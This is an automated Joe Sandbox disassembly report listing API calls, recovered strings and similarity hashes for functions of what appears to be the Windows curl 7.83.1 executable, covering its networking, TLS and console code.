                                          • Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA188
                                          • Part of subcall function 000DA0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA193
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 000DE60E
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 000DE616
                                        Strings
                                        • getsockname() failed with errno %d: %s, xrefs: 000DE5E9
                                        • ssloc inet_ntop() failed with errno %d: %s, xrefs: 000DE630
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _errno$ErrorLast$_strrchr$__sys_errlist__sys_nerrgetsocknamestrncpy
                                        • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                        • API String ID: 2515041809-2605427207
                                        • Opcode ID: 707a92cea73b36ebb6f114c462971ff508dc0421afa951d71061b3af57fd86e9
                                        • Instruction ID: 273cc01f76c733e3ec3254b392a04d269ec029b0267a3456a6dab15e91b98d3b
                                        • Opcode Fuzzy Hash: 707a92cea73b36ebb6f114c462971ff508dc0421afa951d71061b3af57fd86e9
                                        • Instruction Fuzzy Hash: 26214272900218ABDB24AB64DC45ADE77B9EB49350F4081A6F509D7241EF709E858FB1
                                        APIs
                                        • _mbscmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,--dump-module-paths), ref: 000C8F9A
                                        • QueryPerformanceFrequency.API-MS-WIN-CORE-PROFILE-L1-1-0(0012FAF8), ref: 000C8FF7
                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C902C
                                          • Part of subcall function 000C310D: CreateToolhelp32Snapshot.API-MS-WIN-CORE-TOOLHELP-L1-1-0(00000008,00000000), ref: 000C3148
                                          • Part of subcall function 000C310D: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000C3155
                                          • Part of subcall function 000C310D: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 000C316F
                                          • Part of subcall function 000D20F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,000C8A7A,curl 7.83.1 (Windows) %s,00000000), ref: 000D2101
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: CloseCreateErrorFrequencyHandleLastPerformanceQuerySnapshotToolhelp32__acrt_iob_func_mbscmpfflush
                                        • String ID: %s$--dump-module-paths$YR{
                                        • API String ID: 3670006343-1349242960
                                        • Opcode ID: 5cfb4c2905e49702ef6b45a76303b17d3554429073f6568c5402e390389b2228
                                        • Instruction ID: 1958936361e5cc7441960af98d6b419ae11b57af51cf65ab69eaa705e5423f0b
                                        • Opcode Fuzzy Hash: 5cfb4c2905e49702ef6b45a76303b17d3554429073f6568c5402e390389b2228
                                        • Instruction Fuzzy Hash: B60108335587129BC7296764EC06FAE3791DF847A0F15862EF808572D2EF719C428751
                                        APIs
                                        • WSAStartup.WS2_32(00000202,A0F2C5C3), ref: 000DD2A5
                                        • WSACleanup.WS2_32 ref: 000DD31F
                                          • Part of subcall function 000F4E72: GetProcAddress.KERNELBASE(00000000,InitSecurityInterfaceA,?,?,000DD2C2), ref: 000F4EB0
                                          • Part of subcall function 000DD33A: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernel32,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD34B
                                          • Part of subcall function 000DD33A: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,LoadLibraryExA,?,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD363
                                          • Part of subcall function 000DD33A: _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(security.dll,00117348,?,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD374
                                          • Part of subcall function 000DD33A: LoadLibraryExA.KERNELBASE(?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD3B6
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,if_nametoindex), ref: 000DD2DF
                                        • QueryPerformanceFrequency.API-MS-WIN-CORE-PROFILE-L1-1-0(0012FAE8), ref: 000DD315
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: AddressProc$CleanupFrequencyHandleLibraryLoadModulePerformanceQueryStartup_mbspbrk
                                        • String ID: if_nametoindex$iphlpapi.dll
                                        • API String ID: 3026270583-3097795196
                                        • Opcode ID: d492dfae92bc5a60a6fe12c0c381c559036746315a305dff72acf23a84603a61
                                        • Instruction ID: 5f90facbbb8be2a464bcdba01b9ac8999da2583176d39a7042c46828df67a3c5
                                        • Opcode Fuzzy Hash: d492dfae92bc5a60a6fe12c0c381c559036746315a305dff72acf23a84603a61
                                        • Instruction Fuzzy Hash: A8114870B00300ABD734AF74BD0BBAA33E9DF88700F40013FE949C6691FB2089928762
                                        APIs
                                        • WSASetLastError.WS2_32(00002726,00000000,00000000,00000000), ref: 000EF506
                                        • __aulldvrm.LIBCMT ref: 000EF55C
                                        • select.WS2_32(00000100,?,?,?,?), ref: 000EF5E9
                                        • __WSAFDIsSet.WS2_32(000000FF,?), ref: 000EF623
                                        • __WSAFDIsSet.WS2_32(000000FF,?), ref: 000EF65B
                                        • __WSAFDIsSet.WS2_32(000000FF,?), ref: 000EF679
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLast__aulldvrmselect
                                        • String ID:
                                        • API String ID: 1566158641-0
                                        • Opcode ID: 7c7eaca55c8a4fed181c9ffe1ef7a0db5781530610c1a95f5f7def2881df9362
                                        • Instruction ID: df3ee9f3c7a42186e8c8160ae6a9a92dc1910ba2dce555e2e5c5bce63bf632e3
                                        • Opcode Fuzzy Hash: 7c7eaca55c8a4fed181c9ffe1ef7a0db5781530610c1a95f5f7def2881df9362
                                        • Instruction Fuzzy Hash: 32A19471A0065A8FDB798F2AC8846BAB7F9FF58310F1045BEE559E6190E7709E818F40
                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4EE0
                                        Strings
                                        • Could not resolve host: %s, xrefs: 000E504D
                                        • Unix socket path too long: '%s', xrefs: 000E4F20
                                        • Couldn't resolve proxy '%s', xrefs: 000E50E9
                                        • Failed to resolve host '%s' with timeout after %ld ms, xrefs: 000E5016
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: calloc
                                        • String ID: Could not resolve host: %s$Couldn't resolve proxy '%s'$Failed to resolve host '%s' with timeout after %ld ms$Unix socket path too long: '%s'
                                        • API String ID: 2635317215-2215122109
                                        • Opcode ID: e0e5cc5f3e19123571c966ff7581c9915e7f40bbb5902d16b7cd34a3bf818344
                                        • Instruction ID: 9f9322272b06cb3aa50e638bd0d33fa590b24720df031f222de12d74e5485f6e
                                        • Opcode Fuzzy Hash: e0e5cc5f3e19123571c966ff7581c9915e7f40bbb5902d16b7cd34a3bf818344
                                        • Instruction Fuzzy Hash: C371F431E04699AFEF219F65CC45BAE7BB2AF44710F1444B6FD44BF292D6B19C008BA1
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001062F0
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010632C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00106356
                                        Strings
                                        • schannel: failed to send close msg: %s (bytes written: %zd), xrefs: 001062AE
                                        • schannel: shutting down SSL/TLS connection with %s port %hu, xrefs: 00106118
                                        • schannel: ApplyControlToken failure: %s, xrefs: 001061B9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: schannel: ApplyControlToken failure: %s$schannel: failed to send close msg: %s (bytes written: %zd)$schannel: shutting down SSL/TLS connection with %s port %hu
                                        • API String ID: 1294909896-1242988243
                                        • Opcode ID: 4bec1765f87c529166e378f1a23a39c6c70e3d9fa8f5f5ae812cd021fc7456b2
                                        • Instruction ID: 76376e9a38ddf5edc8958643fc14984fb746f4ba99aa6e2e87fbe79f2b8d5c4e
                                        • Opcode Fuzzy Hash: 4bec1765f87c529166e378f1a23a39c6c70e3d9fa8f5f5ae812cd021fc7456b2
                                        • Instruction Fuzzy Hash: 9581A370900229DFCB25DF14DD44BD9B7B5FF48310F0081AAE889A7691D7B4AEA5CF90
                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,000EEBB8,?), ref: 000E8BBF
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,000EEBB8,?,?), ref: 000E8C96
                                          • Part of subcall function 000E88E1: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E8C01,?,?,00000000), ref: 000E8928
                                          • Part of subcall function 000E88E1: InitializeCriticalSectionEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,000E8C01,?,?,00000000), ref: 000E8936
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,000EEBB8,?,?,?,?), ref: 000E8C19
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,000EEBB8,?,?,?,?), ref: 000E8C2E
                                        • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,000E8A20,00000010,00000000,00000000,?,?,?,?,?,?,?,?,?,000EEBB8), ref: 000E8C63
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$CriticalInitializeSection_beginthreadex_errnocallocmalloc
                                        • String ID:
                                        • API String ID: 1055258384-0
                                        • Opcode ID: aa4a75a237811f762d3edd291a267fa9b615a96f9b747f1c3aef38929c82ebc2
                                        • Instruction ID: 2e718edac3a550cf56e80bfc9a78be1dc68f929c04d07c2e1f6b200584fe8314
                                        • Opcode Fuzzy Hash: aa4a75a237811f762d3edd291a267fa9b615a96f9b747f1c3aef38929c82ebc2
                                        • Instruction Fuzzy Hash: 4C31A371A01615EFDB288F65EC4459E7BF5FF89310B20806EE80AE7291DB70A941CB95
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010589A
                                        • WSAGetLastError.WS2_32 ref: 00105A16
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00105A73
                                        Strings
                                        • select/poll on SSL socket, errno: %d, xrefs: 00105A1D
                                        • schannel: timed out sending data (bytes sent: %zd), xrefs: 00105A34
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLastfreemalloc
                                        • String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
                                        • API String ID: 1010545285-3891197721
                                        • Opcode ID: 8baf36e0a96fc980fc3c2216ddb4d67809b28802bab99f8ab7f018df9ffa63a3
                                        • Instruction ID: a330e5c2e989b3d0b501e69e8f36b41b88cd0e1797c014a5b75979e5c21cf49e
                                        • Opcode Fuzzy Hash: 8baf36e0a96fc980fc3c2216ddb4d67809b28802bab99f8ab7f018df9ffa63a3
                                        • Instruction Fuzzy Hash: 5B810671A08701DFC714CF19D884A5ABBE6BF88724F148A2EF89997391D770D941CF92
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 000C3737
                                        • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C3742
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _close_strdup
                                        • String ID: %s\%c%s$%s\%s$._
                                        • API String ID: 2375632809-4149339551
                                        • Opcode ID: af7ce43fc8c073772d759e5a543f30b342f2da8764b45e5b64ad13e8bb3d3fcf
                                        • Instruction ID: 2d0f03271e226c6fe896ead7b1516020f6c4c225bedead18a3465c481b2da7e9
                                        • Opcode Fuzzy Hash: af7ce43fc8c073772d759e5a543f30b342f2da8764b45e5b64ad13e8bb3d3fcf
                                        • Instruction Fuzzy Hash: D41136A79182096AAB196BE89C42EFEB778DF55710B10816EF84096342E6609A4147B1
                                        APIs
                                        • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 000DDCE2
                                        • WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 000DDD3E
                                        • WSAGetLastError.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000,?,0000FFFF,00000008,?,00000004), ref: 000DDD48
                                        Strings
                                        • Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 000DDD50
                                        • Failed to set SO_KEEPALIVE on fd %d, xrefs: 000DDCED
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorIoctlLastsetsockopt
                                        • String ID: Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
                                        • API String ID: 1819429192-3022933585
                                        • Opcode ID: e6f8a622be06d9883b03617c4302aae51a5aa9f0c0e3ccad4f6e8af759110116
                                        • Instruction ID: 7fdbf0eb8250a6830c6e9d9f03c2698f6d959ea966c0b66ff65c8e2dcf63cc8a
                                        • Opcode Fuzzy Hash: e6f8a622be06d9883b03617c4302aae51a5aa9f0c0e3ccad4f6e8af759110116
                                        • Instruction Fuzzy Hash: 26116DB1A00205AFE714DF64DC46EFF76BDEB46710F00426FB515E6180EB649A408BA5
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D6F9B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D6FB9
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D70AA
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D7229
                                        Strings
                                        • Connection #%ld to host %s left intact, xrefs: 000D7182
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Connection #%ld to host %s left intact
                                        • API String ID: 1294909896-3505918467
                                        • Opcode ID: d8fcd09df65db17f0650178bfb1309229a4e788f2c22fe6c11ef7ae8b32381b1
                                        • Instruction ID: 12ce15773bc39525b3194bafb2f6ff260af89937471873e81630e5db76d1d680
                                        • Opcode Fuzzy Hash: d8fcd09df65db17f0650178bfb1309229a4e788f2c22fe6c11ef7ae8b32381b1
                                        • Instruction Fuzzy Hash: 4681D430A04715DBDB2A9F24C8897EDB7E1BF44710F1841ABE84C5B392EB746D81CBA1
                                        APIs
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,000C9002), ref: 000C31FC
                                        • GetConsoleMode.KERNELBASE(00000000,0012F568), ref: 000C3212
                                        • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(Function_000031E0,00000001,?), ref: 000C3239
                                        • SetConsoleMode.KERNELBASE(00000003), ref: 000C3252
                                        • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(Function_000031E0,00000000), ref: 000C326C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Console$CtrlHandlerMode$Handle
                                        • String ID:
                                        • API String ID: 575565773-0
                                        • Opcode ID: 6c1075f0480bbb6e978eb7efa2462f166c1688c5cc45e4435c02e3d948817798
                                        • Instruction ID: cb20daf98baa5857b38dcdbbff8f4ab14f04f8282f899d488a36885c1681ff76
                                        • Opcode Fuzzy Hash: 6c1075f0480bbb6e978eb7efa2462f166c1688c5cc45e4435c02e3d948817798
                                        • Instruction Fuzzy Hash: A5016D70654711BEEB229F34FE09FA936A4AF46762F24823CF961D54E0D7208A938A50
                                        APIs
                                        • inet_pton.WS2_32(00000002,?,?), ref: 000EEAE7
                                        • inet_pton.WS2_32(00000017,?,?), ref: 000EEB16
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: inet_pton
                                        • String ID: Hostname %s was found in DNS cache$localhost
                                        • API String ID: 1350483568-3522642687
                                        • Opcode ID: 681e0c948eb427f5b475ad641440c7f93553d87eb282a1491f598e8045f838cf
                                        • Instruction ID: ab4ec25b7c5e24ee067b2aae9e9c68afb6b18a625b257520740fed8f51b2fb74
                                        • Opcode Fuzzy Hash: 681e0c948eb427f5b475ad641440c7f93553d87eb282a1491f598e8045f838cf
                                        • Instruction Fuzzy Hash: D361E431B0029D9FDF259F66D885AFEBBE6BF88320F14402AE405B7291DB709C41DB90
                                        APIs
                                        • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,0000000A,?,?,?,?), ref: 000C1E56
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F4,?,?,?), ref: 000C1E9D
                                        • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?), ref: 000C1EAD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: BufferConsoleHandleInfoScreenstrtol
                                        • String ID: COLUMNS
                                        • API String ID: 283564500-2475376301
                                        • Opcode ID: fd7f90bdded969573a21a7bd2cd9b81cbbb3fda82b7ca1dff48a7881f1506e3e
                                        • Instruction ID: e51626acc573afcad23ae552619229f85b580c4f3c9e64101eee2b5e48d839cf
                                        • Opcode Fuzzy Hash: fd7f90bdded969573a21a7bd2cd9b81cbbb3fda82b7ca1dff48a7881f1506e3e
                                        • Instruction Fuzzy Hash: 6031BA709006049BDB24DF68C884BEEB7F4AF4A314F20066EE846D6692E735E985CB90
                                        APIs
                                          • Part of subcall function 000D0B38: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 000D0B6D
                                          • Part of subcall function 000D0B38: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 000D0B74
                                          • Part of subcall function 000DD33A: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernel32,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD34B
                                          • Part of subcall function 000DD33A: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,LoadLibraryExA,?,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD363
                                          • Part of subcall function 000DD33A: _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(security.dll,00117348,?,?,?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD374
                                          • Part of subcall function 000DD33A: LoadLibraryExA.KERNELBASE(?,?,?,000F4EA1,?,?,000DD2C2), ref: 000DD3B6
                                        • GetProcAddress.KERNELBASE(00000000,InitSecurityInterfaceA,?,?,000DD2C2), ref: 000F4EB0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule$LibraryLoad_mbspbrk
                                        • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                                        • API String ID: 2293913591-3788156360
                                        • Opcode ID: 13b8f7a38b8333569385fd940b1316c935e0afd569bfd3e3ebec5ce4b8142a8a
                                        • Instruction ID: 1f6dca60acf5242acf41eda28f0709f40d797cec11ac34453dc05a286cdb551d
                                        • Opcode Fuzzy Hash: 13b8f7a38b8333569385fd940b1316c935e0afd569bfd3e3ebec5ce4b8142a8a
                                        • Instruction Fuzzy Hash: 88F0E971A047166AEF652B387D1A7AB2395EB80714F00453AEA00E69C5FB70CC968650
                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,000D2254,?,?,?,000C8B8E), ref: 000E1CFE
